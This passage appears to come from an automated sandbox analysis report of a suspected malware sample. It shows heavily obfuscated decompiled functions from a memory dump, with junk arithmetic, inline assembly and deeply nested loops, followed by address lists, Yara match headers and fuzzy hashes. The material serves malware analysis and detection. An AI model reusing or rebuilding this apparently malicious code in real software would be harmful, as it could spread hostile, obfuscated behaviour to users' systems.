						_pop(_t77);
						_t58 =  *0x6fc802f8 ^  *0xd0b60fd9;
						asm("adc esp, [0xcfabdd37]");
						 *0x6760a6e4 =  *0x6760a6e4 |  *0x6fc802f8 ^  *0xd0b60fd9;
						if( *0x6760a6e4 < 0) {
							_push(0x547a129f);
							_t53 = _t53 | 0xffffffffffff6dfb;
							asm("sbb dl, 0x30");
							_t78 = _t77 |  *0xd73d462;
							_t38 = _t38 - 0x8a;
							if(_t38 >= 0) {
								_t53 =  *0xa3021e7c * 0xf9e3;
								_pop( *0x37b7f02b);
								asm("stosb");
								if(_t53 >= 0) {
									 *0xf0872570 =  *0xf0872570 | _t38;
									_t74 = _t74 + 1;
									_pop(_t58);
									_t45 =  *0x3d8b246e;
									 *0x2f44aec9 =  *0x2f44aec9 + _t58;
									_pop(_t86);
									asm("adc esp, [0xaa209899]");
									_t38 = _t38 + 0x00000001 & 0x0000002a;
									_t80 = (_t78 &  *0x77920b2d) + 1;
									_t68 =  *0xe56d1d31;
									L1();
									 *0x2926e8 =  *0x2926e8 >> 0xbb;
									_t53 = _t53 ^ 0x00000010;
									if(_t53 <= 0) {
										asm("adc edi, [0x76e59d13]");
										 *0xea911414 =  *0xea911414 + _t45;
										asm("rol dword [0xd90140fb], 0xdc");
										_t53 = _t53 + 1;
										asm("ror dword [0x88f06ed4], 0x93");
										asm("rcl dword [0xfcbc9b0b], 0xf1");
										asm("sbb ebx, [0x58670a3f]");
										 *0xc752a2ca =  *0xc752a2ca >> 0x7a;
										asm("adc ebx, 0x52382e8c");
										 *0x12fec0e1 =  *0x12fec0e1 ^ _t53;
										 *0xc73ea98 =  *0xc73ea98 | _t80;
										asm("sbb ebx, 0xa60d8edb");
										 *0xcca59d37 =  *0xcca59d37 ^ 0x847f4b97;
										asm("adc [0xc0649fba], eax");
										asm("adc [0xb6665193], eax");
										asm("lodsd");
										_t81 = _t80;
										 *0x3a10c86 =  *0x3a10c86 >> 8;
										_t86 =  *0x76e3a19a;
										 *0x76e3a19a =  *0x9c65557f * 0x68f5 - 1;
										 *0xbb0d2d3b =  *0xbb0d2d3b - _t81;
										asm("adc eax, [0xe57cabfd]");
										 *0x935ceec =  *0x935ceec - 0x847f4b97;
										asm("rol byte [0x4c492f32], 0x15");
										_push( *0x5dc8a407);
										_t74 =  *0x9065636b * 0x49be;
										asm("lodsd");
										_pop(_t66);
										_t45 = (0x000000e5 &  *0xae6ba087 ^  *0x4b0b741b) + 0x6b06fff5 ^ 0x7637760e;
										_t68 = 0x847f4b97 -  *0xecc757b9;
										 *0x7fcd3ef3 = _t53;
										_t58 =  *0xe6c0dfb;
										 *0xe6c0dfb = _t66;
										asm("rcl dword [0x428943f5], 0xad");
										asm("sbb ecx, [0x4f472f06]");
										asm("adc [0x793fa80d], edi");
										_t82 = _t81 -  *0x27126cf5;
										 *0x5fac7520 =  *0x5fac7520 << 0x6a;
										_t38 = 0x3ff632a0;
										if(0x3ff632c1 < 0) {
											_t58 = _t58 | 0x7ba6d579;
											_t74 =  *0xee40c56a * 0xe394;
											 *0x64bf12f9 =  *0x64bf12f9 & 0x3ff632a0;
											if( *0x64bf12f9 == 0) {
												asm("adc ebp, [0x78e7f075]");
												asm("lodsb");
												_push(_t53);
												asm("rcl dword [0xf4750365], 0xd5");
												 *0x9ff0e1e0 =  *0x9ff0e1e0 - _t58;
												 *0xdc0df9e2 =  *0xdc0df9e2 + _t53;
												 *0x84291b9f = _t82;
												 *0x82498499 =  *0x82498499 >> 0x7d;
												if( *0xdc0df9e2 < 0) {
													_t43 =  *0x10792f7d * 0xab04;
													_push(_t43);
													asm("sbb [0xe834e8ed], edi");
													_t38 = _t43 +  *0x272619dd | 0x77b8e9f7;
													_push( *0x376bdb9f);
													asm("sbb [0xdf1afd9c], esi");
													asm("sbb edx, [0xf9ba5dcb]");
													_t45 = (_t45 |  *0xc32612f7) - 1;
													asm("rcr dword [0x23c63edb], 0x7b");
													_t86 = _t86 -  *0x410cbdcf - 1;
													asm("sbb ch, 0x38");
													_t68 = _t68 &  *0x68386d17;
													L1();
													_t53 = _t53 +  *0x35f227b5 -  *0xf577c833;
													_t58 =  *0xba58908e;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}

















                                      0x0041db48
                                      0x0041db48
                                      0x0041db4d
                                      0x0041db57
                                      0x0041db5e
                                      0x0041db63
                                      0x0041db69
                                      0x0041db6b
                                      0x0041db71
                                      0x0041db77
                                      0x0041db7d
                                      0x0041db7d
                                      0x0041db83
                                      0x0041db84
                                      0x0041db91
                                      0x0041db97
                                      0x0041db9d
                                      0x0041dba3
                                      0x0041dba9
                                      0x0041dbab
                                      0x00000000
                                      0x00000000
                                      0x0041dbb1
                                      0x0041dbb1
                                      0x0041dbb7
                                      0x00000000
                                      0x00000000
                                      0x0041dbbd
                                      0x0041dbc3
                                      0x0041dbc9
                                      0x0041dbcf
                                      0x00000000
                                      0x00000000
                                      0x0041dbd5
                                      0x0041dbe9
                                      0x0041dbef
                                      0x0041dbf0
                                      0x0041dbf6
                                      0x0041dbfb
                                      0x0041dc02
                                      0x0041dc08
                                      0x0041dc0e
                                      0x0041dc14
                                      0x0041dc1a
                                      0x0041dc1b
                                      0x0041dc22
                                      0x0041dc2e
                                      0x0041dc31
                                      0x0041dc34
                                      0x0041dc35
                                      0x0041dc41
                                      0x0041dc48
                                      0x0041dc4e
                                      0x0041dc54
                                      0x0041dc5a
                                      0x0041dc60
                                      0x0041dc66
                                      0x0041dc69
                                      0x0041dc6f
                                      0x0041dc76
                                      0x0041dc7b
                                      0x0041dc7b
                                      0x0041dc81
                                      0x0041dc88
                                      0x0041dc8f
                                      0x00000000
                                      0x00000000
                                      0x0041dc95
                                      0x0041dc9b
                                      0x0041dca1
                                      0x0041dca3
                                      0x0041dcaa
                                      0x0041dcaf
                                      0x0041dcaf
                                      0x0041dcb5
                                      0x00000000
                                      0x00000000
                                      0x0041dcbb
                                      0x0041dcc1
                                      0x0041dcc8
                                      0x0041dccd
                                      0x0041dcd4
                                      0x0041dcd7
                                      0x0041dcdd
                                      0x0041dcde
                                      0x0041dcdf
                                      0x0041dce2
                                      0x0041dce8
                                      0x0041dcee
                                      0x0041dcf4
                                      0x0041dcfa
                                      0x0041dcfc
                                      0x0041dcfd
                                      0x0041dd03
                                      0x0041dd03
                                      0x0041d176
                                      0x0041d176
                                      0x0041d183
                                      0x0041d189
                                      0x0041d190
                                      0x0041d193
                                      0x0041d199
                                      0x0041d19b
                                      0x0041d1a1
                                      0x0041d1a7
                                      0x0041d1ad
                                      0x0041d1b9
                                      0x0041d1bf
                                      0x0041d1c5
                                      0x0041d1cb
                                      0x0041d1d1
                                      0x0041d1d8
                                      0x0041d1d9
                                      0x0041d1dc
                                      0x0041d1de
                                      0x0041d1ef
                                      0x0041d1f6
                                      0x0041d1fc
                                      0x0041d1fe
                                      0x0041d210
                                      0x0041d216
                                      0x0041d223
                                      0x0041d229
                                      0x0041d230
                                      0x0041d236
                                      0x0041d23c
                                      0x0041d241
                                      0x0041d24e
                                      0x0041d254
                                      0x0041d25a
                                      0x0041d25b
                                      0x0041d262
                                      0x0041d263
                                      0x0041d269
                                      0x0041d26f
                                      0x0041d275
                                      0x0041d281
                                      0x0041d286
                                      0x0041d28c
                                      0x0041d28f
                                      0x0041d295
                                      0x0041d298
                                      0x0041d29e
                                      0x0041d2a8
                                      0x0041d2ae
                                      0x0041d2af
                                      0x0041d2b5
                                      0x0041d2bb
                                      0x0041d2c2
                                      0x0041d2c3
                                      0x0041d2c9
                                      0x0041d2cf
                                      0x0041d2d6
                                      0x0041d2e3
                                      0x0041d2e6
                                      0x0041d2e7
                                      0x0041d2ed
                                      0x0041d2f2
                                      0x0041d2f9
                                      0x0041d2fc
                                      0x0041d313
                                      0x0041d319
                                      0x0041d330
                                      0x0041d337
                                      0x0041d338
                                      0x0041d33f
                                      0x0041d347
                                      0x0041d34d
                                      0x0041d35a
                                      0x0041d362
                                      0x0041d36d
                                      0x0041d373
                                      0x0041d379
                                      0x0041d37f
                                      0x0041d386
                                      0x0041d38c
                                      0x0041d393
                                      0x0041d3a0
                                      0x0041d3a8
                                      0x0041d3a8
                                      0x0041d3ae
                                      0x0041d3b4
                                      0x0041d3c0
                                      0x0041d3c6
                                      0x0041d3cd
                                      0x0041d3ec
                                      0x0041d3f6
                                      0x0041d3f7
                                      0x0041d3f8
                                      0x0041d3fe
                                      0x0041d404
                                      0x0041d40a
                                      0x0041d40a
                                      0x0041d410
                                      0x0041d417
                                      0x0041d41d
                                      0x0041d423
                                      0x0041d429
                                      0x0041d432
                                      0x0041d433
                                      0x0041d439
                                      0x0041d43f
                                      0x0041d449
                                      0x0041d44f
                                      0x0041d455
                                      0x0041d45b
                                      0x0041d45c
                                      0x0041d45d
                                      0x0041d464
                                      0x0041d46a
                                      0x0041d471
                                      0x0041d477
                                      0x0041d47e
                                      0x0041d484
                                      0x0041d494
                                      0x0041d49b
                                      0x0041d4a7
                                      0x0041d4ac
                                      0x0041d4b2
                                      0x0041d4b8
                                      0x0041d4be
                                      0x0041d4c5
                                      0x0041d4d2
                                      0x0041d4d3
                                      0x0041d4d6
                                      0x0041d4dc
                                      0x0041d4ed
                                      0x0041d4f3
                                      0x0041d4f3
                                      0x0041d47e
                                      0x0041d44f
                                      0x0041d433
                                      0x0041d2fc
                                      0x0041d2af
                                      0x0041d298
                                      0x0041d275
                                      0x0041d1dc
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1eb07d8736ca1b6b78d72e44b2ad17a2d08f83b8331804622ed841a2891688b6
                                      • Instruction ID: c012d8250f47b7ce8420322e3ba37e126467d39fbaa5dd985268f3246aec8ea5
                                      • Opcode Fuzzy Hash: 1eb07d8736ca1b6b78d72e44b2ad17a2d08f83b8331804622ed841a2891688b6
                                      • Instruction Fuzzy Hash: ABD19AB2908780DFEB12CF38D88AB413FF2F706314B08824ED591975A2D779256ACF49
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041E79E, Relevance: .2, Instructions: 225COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 52%
                                      			E0041E79E(signed char __eax, signed int __ebx, signed int __ecx, signed char __edx, signed int __eflags) {
				signed int _t31;
				signed char _t41;
				char _t43;
				intOrPtr _t48;
				signed int _t49;
				signed int _t57;
				signed int _t58;
				void* _t61;
				signed int _t62;
				signed int _t70;
				signed int _t72;
				signed int _t77;

				_t77 = __eflags;
				_t41 = __edx;
				_t38 = __ecx;
				_t32 = __ebx;
				_t26 = __eax;
				goto L1;
				do {
					do {
						do {
							do {
								do {
									do {
										do {
											do {
												do {
													do {
														do {
															do {
																do {
																	do {
																		do {
																			do {
																				L1:
																			} while (_t77 <= 0);
																			asm("ror byte [0x9b191be1], 0xfa");
																			asm("sbb cl, [0xd4deb9d0]");
																			 *0x9c22f92e =  *0x9c22f92e >> 0xc9;
																			asm("stosb");
																			 *0x532fcced =  *0x532fcced >> 0xad;
																			asm("movsw");
																			 *0x7e4c6de7 =  *0x7e4c6de7 << 0xbd;
																			 *0x1c67890a =  *0x1c67890a - (_t26 ^  *0x7c3a89b4);
																			 *0xa33f6226 =  *0xa33f6226 | _t32;
																			asm("lodsb");
																			_t57 =  *0x7e22218d;
																			_t38 =  *0xa7220569 * 0xe265;
																			_t48 =  *0x684366db;
																			_push(0x1d596fd3);
																			_t72 = _t72 - 1 -  *0x36d9cb;
																			 *0xc052dbdc =  *0xc052dbdc & _t57;
																			_t26 = 0x9e666c94;
																			_t41 = _t41 - 0xfdaa80d1;
																			_t32 = (_t32 | 0xffffffffff7fefee) + 1;
																			 *0x96261cb2 =  *0x96261cb2 << 0x45;
																			 *0xb9066a84 =  *0xb9066a84 + _t32;
																			asm("scasd");
																			 *0xd78ff76d =  *0xd78ff76d >> 0x41;
																			_t70 =  *0xb6ec1285;
																			 *0xb6ec1285 =  *0xc1daad69 * 0x5205;
																			 *0x98833428 =  *0x98833428 | 0x9e666c94;
																		} while ( *0x98833428 < 0);
																		_t72 =  *0x72e5677c * 0xfd2d;
																		_pop(_t41);
																		 *0xd127142b =  *0xd127142b >> 0x53;
																		asm("rcr dword [0x8792deec], 0xe0");
																		asm("sbb edi, [0x2742846e]");
																		asm("sbb ebx, [0xcd95b2f]");
																		_t26 = 0x9e666c94 -  *0x67282f2b & 0x000000e6;
																		asm("adc edx, 0x12940468");
																		 *0x48f9d586 =  *0x48f9d586 >> 0xb7;
																		_t32 = _t32 +  *0x813b07a0;
																		 *0x1cc9a2cc =  *0x1cc9a2cc | _t57;
																		_t49 = _t48 - 1;
																		_t38 = (_t38 |  *0x386c048f) & 0x000000e2;
																		 *0x89cfaad4 =  *0x89cfaad4 - _t41;
																	} while ( *0x89cfaad4 == 0);
																	 *0x81a15274 =  *0x81a15274 & _t49;
																	 *0xfe9d78fa =  *0xfe9d78fa >> 0xdc;
																	 *0x708c2cbd =  *0x708c2cbd ^ _t72;
																	_push( *0x9ea0cbfd);
																	_push( *0xc86c8a2f);
																	 *0xaa8a8ba =  *0xaa8a8ba | _t49;
																	_t38 = _t38 -  *0xbf32d607;
																	asm("rcl byte [0x21a6ceb3], 0x23");
																	_t32 = 0x50b55fbd;
																	_t26 = _t26 |  *0xd4f8db0a;
																} while (_t26 < 0);
																_t32 = 0x50b55fbc;
																_t72 = _t72 |  *0xe2934d95;
																asm("adc eax, 0xbe0465a1");
																_t58 = 0x50b55fbd;
																asm("sbb edi, [0xfdad02ed]");
																 *0x403bafcc =  *0x403bafcc << 0x32;
																_t26 = _t26 - 0x12 +  *0xd4ee4087;
																 *0x1ba453fe =  *0x1ba453fe << 0x28;
																asm("adc [0xf15e74d9], esi");
															} while ( *0x1ba453fe < 0);
															_t38 = _t38 &  *0xf84de972;
														} while (_t38 != 0);
														asm("rcl dword [0x155b967a], 0x42");
														_t38 = _t38 - 0xb5;
														_t32 = 0x50b55fbc &  *0x6d1fbb67;
														_t77 = 0x50b55fbd;
													} while (0x50b55fbd <= 0);
													asm("adc ecx, [0x69bcb81b]");
													_t26 = 0xca772e9a;
													_t61 = (_t58 |  *0xed14f906) -  *0x7318a436 -  *0x67e1deee;
													_t41 = _t41 | 0x000000d7;
													 *0x359b9916 =  *0x359b9916 >> 0xbd;
													asm("scasb");
													_push(_t41);
													 *0x3602a022 =  *0x3602a022 ^ _t32;
												} while ( *0x3602a022 <= 0);
												 *0x82ae8b16 =  *0x82ae8b16 << 0x70;
												 *0xc03468b8 =  *0xc03468b8 >> 0x7b;
												asm("adc [0x9fd3c9fc], ebx");
												 *0xd55f930e =  *0xd55f930e >> 0xb1;
												_push(_t38 | 0x000000b1);
												asm("rcr byte [0x6c8164b7], 0xd4");
												asm("rcr dword [0xc80268de], 0xe6");
												_t26 =  *0x8586326a * 0x00002c35 &  *0x63ef3283;
												_t32 = _t32 + 1;
												_t72 =  *0x1477da60 * 0x3143;
												_pop(_t38);
												_t62 = _t61 - 1;
											} while (_t62 > 0);
											_t72 =  *0x2ac5ee77;
											 *0x44820f3b =  *0x44820f3b >> 0x93;
											_t14 = _t41 |  *0xb342cfb7;
											_t41 =  *0x222b8783;
											 *0x222b8783 = _t14;
											asm("adc ebp, 0x3c4bbb95");
											 *0xbc106b8 =  *0xbc106b8 + 0xdbbee0c4;
											 *0x4170a29f =  *0x4170a29f ^ _t62;
											_push(_t72);
											_t38 = _t38 + 1;
											_t26 = _t26 +  *0xac3517df;
											 *0xecdd539a =  *0xecdd539a + _t70;
										} while (_t26 !=  *0xcfe1ebea);
										asm("rcr dword [0xb5d8457b], 0x18");
										_t72 = _t72 ^  *0x5396d797;
										asm("movsw");
										 *0x3e72d1e2 =  *0x3e72d1e2 ^ _t41;
									} while ( *0x3e72d1e2 <= 0);
									_t43 = _t41 -  *0x12caa976;
									 *0x6f9af32 = _t43;
									_t38 = 0xe488be16;
									asm("adc [0xe58e6219], edx");
									_t32 = _t32 -  *0xde8f67b1;
									asm("rcr byte [0xc9c565c9], 0x4b");
									asm("sbb esi, [0x52a8209b]");
									_t41 = _t43 -  *0xa019b2d2;
								} while (_t41 != 0);
								asm("adc edx, 0xdcf1f675");
								_push(0xe488be16);
								asm("adc ebx, [0xe53df026]");
								asm("rol dword [0xb734cdd], 0x64");
							} while ( *0x50bdb56a * 0xe8c8 == 0);
							asm("adc ebx, [0xe8366e3e]");
							asm("ror dword [0xd89193fd], 0x39");
							asm("sbb al, 0x22");
							_pop( *0x9e517b9e);
							asm("rcl dword [0xc969beb9], 0x99");
							_t26 = _t26 -  *0xaa12cde6;
							asm("adc [0x248c8d30], dh");
							 *0x7767fe6c =  *0x7767fe6c + _t26;
							asm("adc [0xbc10c31e], esi");
							 *0x5c3a772b =  *0x5c3a772b << 0x30;
							 *0x9f3735e1 =  *0x9f3735e1 | _t26;
							asm("adc esi, [0x731bf835]");
							_t38 = 0xe488be16 +  *0x31b83c8;
							asm("ror dword [0x86b57764], 0xd0");
							_push(_t26);
							_t32 = _t32 &  *0xac2392cb &  *0xee9ae689;
							_t41 = (_t41 + 0x000000e7 ^  *0x4e4dbbf9) - 0xb1;
						} while (_t26 !=  *0x92f9eabd);
						asm("rol dword [0xbeeb1b7b], 0x66");
						_t32 = _t32 &  *0xe733a8e5;
						_t38 = _t38 |  *0x3285d936;
						 *0x15449929 =  *0x15449929 >> 0xc9;
					} while ( *0x15449929 <= 0);
					_t32 =  *0x7a7da57e * 0x6a9e;
					_t38 = _t38 - 0x73671e92;
					asm("rcr byte [0xb7c0a0a0], 0x57");
					 *0x97cc5625 =  *0x97cc5625 << 0x5d;
				} while ( *0x97cc5625 >= 0);
				asm("adc edi, [0x764aed71]");
				asm("cmpsb");
				 *0xe7b9e82a =  *0xe7b9e82a - _t26;
				 *0x4cbfda14 = _t38;
				_t31 = _t26 - 1;
				 *0x3e1c3002 =  *0x3e1c3002 ^ _t31;
				 *0x9e103717 =  *0x9e103717 | _t31;
				asm("ror byte [0xac50d4c9], 0x12");
				asm("rcr dword [0xb34c3c8f], 0x24");
				return _t31;
			}















                                      0x0041e79e
                                      0x0041e79e
                                      0x0041e79e
                                      0x0041e79e
                                      0x0041e79e
                                      0x0041e79f
                                      0x0041e7a1
                                      0x0041e7a1
                                      0x0041e7a1
                                      0x0041e7a1
                                      0x0041e7a1
                                      0x0041e7a1
                                      0x0041e7a1
                                      0x0041e7a1
                                      0x0041e7a1
                                      0x0041e7a1
                                      0x0041e7a1
                                      0x0041e7a1
                                      0x0041e7a1
                                      0x0041e7a1
                                      0x0041e7a1
                                      0x0041e7a1
                                      0x0041e7a1
                                      0x0041e7a1
                                      0x0041e7a9
                                      0x0041e7b0
                                      0x0041e7b6
                                      0x0041e7bd
                                      0x0041e7be
                                      0x0041e7cb
                                      0x0041e7cd
                                      0x0041e7d4
                                      0x0041e7e0
                                      0x0041e7f2
                                      0x0041e7fe
                                      0x0041e7ff
                                      0x0041e81a
                                      0x0041e826
                                      0x0041e82b
                                      0x0041e831
                                      0x0041e841
                                      0x0041e846
                                      0x0041e84c
                                      0x0041e84d
                                      0x0041e854
                                      0x0041e860
                                      0x0041e861
                                      0x0041e86e
                                      0x0041e86e
                                      0x0041e874
                                      0x0041e874
                                      0x0041e880
                                      0x0041e88a
                                      0x0041e88b
                                      0x0041e894
                                      0x0041e8ad
                                      0x0041e8b3
                                      0x0041e8b9
                                      0x0041e8bc
                                      0x0041e8c2
                                      0x0041e8c9
                                      0x0041e8cf
                                      0x0041e8d5
                                      0x0041e8d6
                                      0x0041e8d9
                                      0x0041e8d9
                                      0x0041e8e5
                                      0x0041e8eb
                                      0x0041e8f2
                                      0x0041e8f8
                                      0x0041e8fe
                                      0x0041e908
                                      0x0041e90e
                                      0x0041e915
                                      0x0041e91c
                                      0x0041e926
                                      0x0041e926
                                      0x0041e93d
                                      0x0041e93e
                                      0x0041e944
                                      0x0041e949
                                      0x0041e956
                                      0x0041e95c
                                      0x0041e966
                                      0x0041e96c
                                      0x0041e973
                                      0x0041e973
                                      0x0041e97f
                                      0x0041e97f
                                      0x0041e98b
                                      0x0041e992
                                      0x0041e99b
                                      0x0041e99b
                                      0x0041e99b
                                      0x0041e9ad
                                      0x0041e9bf
                                      0x0041e9c5
                                      0x0041e9cb
                                      0x0041e9ce
                                      0x0041e9db
                                      0x0041e9dc
                                      0x0041e9dd
                                      0x0041e9dd
                                      0x0041e9f3
                                      0x0041ea00
                                      0x0041ea07
                                      0x0041ea17
                                      0x0041ea2d
                                      0x0041ea2e
                                      0x0041ea35
                                      0x0041ea3c
                                      0x0041ea42
                                      0x0041ea43
                                      0x0041ea4d
                                      0x0041ea4e
                                      0x0041ea4e
                                      0x0041ea55
                                      0x0041ea61
                                      0x0041ea68
                                      0x0041ea68
                                      0x0041ea68
                                      0x0041ea74
                                      0x0041ea80
                                      0x0041ea86
                                      0x0041ea8c
                                      0x0041ea8d
                                      0x0041ea94
                                      0x0041ea9a
                                      0x0041eaa6
                                      0x0041eab2
                                      0x0041eab9
                                      0x0041eabf
                                      0x0041eac1
                                      0x0041eac1
                                      0x0041eacd
                                      0x0041ead3
                                      0x0041eadf
                                      0x0041eae4
                                      0x0041eaea
                                      0x0041eaf0
                                      0x0041eaf7
                                      0x0041eafd
                                      0x0041eafd
                                      0x0041eb09
                                      0x0041eb0f
                                      0x0041eb10
                                      0x0041eb16
                                      0x0041eb1d
                                      0x0041eb33
                                      0x0041eb39
                                      0x0041eb40
                                      0x0041eb42
                                      0x0041eb4e
                                      0x0041eb55
                                      0x0041eb5b
                                      0x0041eb61
                                      0x0041eb6b
                                      0x0041eb71
                                      0x0041eb78
                                      0x0041eb7e
                                      0x0041eb90
                                      0x0041eb9c
                                      0x0041eba9
                                      0x0041ebaa
                                      0x0041ebb0
                                      0x0041ebb3
                                      0x0041ebbf
                                      0x0041ebc6
                                      0x0041ebcc
                                      0x0041ebd2
                                      0x0041ebd9
                                      0x0041ebe5
                                      0x0041ebef
                                      0x0041ebf5
                                      0x0041ebfc
                                      0x0041ebfc
                                      0x0041ec09
                                      0x0041ec1b
                                      0x0041ec23
                                      0x0041ec29
                                      0x0041ec30
                                      0x0041ec37
                                      0x0041ec3d
                                      0x0041ec43
                                      0x0041ec4a
                                      0x0041ec51

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b6088c854d0e5aa51a135ab6e7dccb803428ab5452d3964d89b7c92a0dae0ecb
                                      • Instruction ID: 3f3e82ea6b039653b9c352744744aa8a56cd7c0949c12c309c9ffa56a23054e2
                                      • Opcode Fuzzy Hash: b6088c854d0e5aa51a135ab6e7dccb803428ab5452d3964d89b7c92a0dae0ecb
                                      • Instruction Fuzzy Hash: A9B185B6808381CFE729CF39E98A6403FB5F792324B18024EC9B1A71E6D7342525DF49
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041D173, Relevance: .2, Instructions: 179COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E0041D173() {
				char _v3;
				signed int _t19;
				void* _t20;
				signed int _t21;
				signed int _t28;
				signed int _t30;
				signed char _t31;
				signed char _t33;
				intOrPtr _t34;
				signed int _t39;
				void* _t41;
				signed char _t43;
				signed char _t48;
				signed char _t49;
				signed char _t50;
				void* _t56;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				signed int _t66;
				signed int _t76;
				signed int _t87;
				void* _t88;
				intOrPtr _t89;
				signed int _t92;
				signed int _t94;
				intOrPtr _t99;

				L1:
				 *0x2be5a709 = _t92;
				_t94 =  *0x2be5a709 ^  *0xc3b40dd9;
				_push(_t66);
				_t43 = _t41 + 0x00000001 ^ 0x00000032;
				if(_t43 < 0) {
					 *0xb22aac33 =  *0xb22aac33 & _t30;
					asm("sbb [0xf3b49627], eax");
					 *0x5ca43be =  *0x5ca43be & _t30;
					 *0x480dbdc0 = _t94;
					 *0xd2280d9c = _t43;
					asm("sbb dh, [0xb75a4fd7]");
					 *0x190698bf =  *0x190698bf >> 0xc;
					_t31 = _t30 + 1;
					if(( *0xd2280d9c | 0x00000012) < 0) {
						asm("ror dword [0x2f5b1379], 0x40");
						asm("rcr byte [0x94b47604], 0x26");
						 *0x6fc802f8 =  *0x88239d69 * 0xccc2;
						asm("movsw");
						 *0x7d10d93c =  *0x7d10d93c & _t31;
						_t33 =  *0xaf35b028 &  *0x28e3611f;
						asm("ror dword [0x79c109d9], 0x97");
						 *0x80c7ee0e =  *0x80c7ee0e ^ _t33;
						asm("sbb [0x5d99a0c], al");
						 *0x669d42b4 = _t19;
						 *0xf0700a9c =  *0xf0700a9c >> 0x57;
						 *0x4819e00a =  *0x4819e00a ^ _t33;
						_pop(_t20);
						asm("ror byte [0x8bdcc520], 0x41");
						asm("adc esp, [0xcfabdd37]");
						 *0x6760a6e4 =  *0x6760a6e4 |  *0x6fc802f8 ^  *0xd0b60fd9;
						if( *0x6760a6e4 < 0) {
							_push(0x547a129f);
							asm("sbb dl, 0x30");
							_t21 = _t20 - 0x8a;
							if(_t21 >= 0) {
								_t48 =  *0xa3021e7c * 0xf9e3;
								_pop( *0x37b7f02b);
								asm("stosb");
								if(_t48 >= 0) {
									 *0xf0872570 =  *0xf0872570 | _t21;
									_pop(_t56);
									_t34 =  *0x3d8b246e;
									 *0x2f44aec9 =  *0x2f44aec9 + _t56;
									asm("adc esp, [0xaa209899]");
									_t87 =  &_v3;
									L1();
									 *0x2926e8 =  *0x2926e8 >> 0xbb;
									_t49 = _t48 ^ 0x00000010;
									if(_t49 <= 0) {
										asm("adc edi, [0x76e59d13]");
										 *0xea911414 =  *0xea911414 + _t34;
										asm("rol dword [0xd90140fb], 0xdc");
										_t50 = _t49 + 1;
										asm("ror dword [0x88f06ed4], 0x93");
										asm("rcl dword [0xfcbc9b0b], 0xf1");
										asm("sbb ebx, [0x58670a3f]");
										 *0xc752a2ca =  *0xc752a2ca >> 0x7a;
										asm("adc ebx, 0x52382e8c");
										 *0x12fec0e1 =  *0x12fec0e1 ^ _t50;
										 *0xc73ea98 =  *0xc73ea98 | _t87;
										asm("sbb ebx, 0xa60d8edb");
										 *0xcca59d37 =  *0xcca59d37 ^ 0x847f4b97;
										asm("adc [0xc0649fba], eax");
										asm("adc [0xb6665193], eax");
										asm("lodsd");
										_t88 = _t87;
										 *0x3a10c86 =  *0x3a10c86 >> 8;
										_t99 =  *0x76e3a19a;
										 *0x76e3a19a =  *0x9c65557f * 0x68f5 - 1;
										 *0xbb0d2d3b =  *0xbb0d2d3b - _t88;
										asm("adc eax, [0xe57cabfd]");
										 *0x935ceec =  *0x935ceec - 0x847f4b97;
										asm("rol byte [0x4c492f32], 0x15");
										asm("lodsd");
										_t62 =  *0x5dc8a407;
										_t39 = (0x000000e5 &  *0xae6ba087 ^  *0x4b0b741b) + 0x6b06fff5 ^ 0x7637760e;
										_t76 = 0x847f4b97 -  *0xecc757b9;
										 *0x7fcd3ef3 = _t50;
										_t63 =  *0xe6c0dfb;
										 *0xe6c0dfb = _t62;
										asm("rcl dword [0x428943f5], 0xad");
										asm("sbb ecx, [0x4f472f06]");
										asm("adc [0x793fa80d], edi");
										_t89 = _t88 -  *0x27126cf5;
										 *0x5fac7520 =  *0x5fac7520 << 0x6a;
										if(0x3ff632c1 < 0) {
											_t64 = _t63 | 0x7ba6d579;
											 *0x64bf12f9 =  *0x64bf12f9 & 0x3ff632a0;
											if( *0x64bf12f9 == 0) {
												asm("adc ebp, [0x78e7f075]");
												asm("lodsb");
												_push(_t50);
												asm("rcl dword [0xf4750365], 0xd5");
												 *0x9ff0e1e0 =  *0x9ff0e1e0 - _t64;
												 *0xdc0df9e2 =  *0xdc0df9e2 + _t50;
												 *0x84291b9f = _t89;
												 *0x82498499 =  *0x82498499 >> 0x7d;
												if( *0xdc0df9e2 < 0) {
													_t28 =  *0x10792f7d * 0xab04;
													_push(_t28);
													asm("sbb [0xe834e8ed], edi");
													_t19 = _t28 +  *0x272619dd | 0x77b8e9f7;
													_push( *0x376bdb9f);
													asm("sbb [0xdf1afd9c], esi");
													asm("sbb edx, [0xf9ba5dcb]");
													_t30 = (_t39 |  *0xc32612f7) - 1;
													asm("rcr dword [0x23c63edb], 0x7b");
													_t92 = _t99 -  *0x410cbdcf - 1;
													asm("sbb ch, 0x38");
													_t66 = _t76 &  *0x68386d17;
													L1();
													_t41 = _t50 +  *0x35f227b5 -  *0xf577c833;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}






























                                      0x0041d176
                                      0x0041d176
                                      0x0041d183
                                      0x0041d189
                                      0x0041d190
                                      0x0041d199
                                      0x0041d1a1
                                      0x0041d1a7
                                      0x0041d1b9
                                      0x0041d1bf
                                      0x0041d1c5
                                      0x0041d1cb
                                      0x0041d1d1
                                      0x0041d1d8
                                      0x0041d1dc
                                      0x0041d1de
                                      0x0041d1ef
                                      0x0041d1f6
                                      0x0041d1fc
                                      0x0041d1fe
                                      0x0041d210
                                      0x0041d229
                                      0x0041d230
                                      0x0041d236
                                      0x0041d23c
                                      0x0041d241
                                      0x0041d254
                                      0x0041d25a
                                      0x0041d25b
                                      0x0041d269
                                      0x0041d26f
                                      0x0041d275
                                      0x0041d281
                                      0x0041d28c
                                      0x0041d295
                                      0x0041d298
                                      0x0041d29e
                                      0x0041d2a8
                                      0x0041d2ae
                                      0x0041d2af
                                      0x0041d2b5
                                      0x0041d2c2
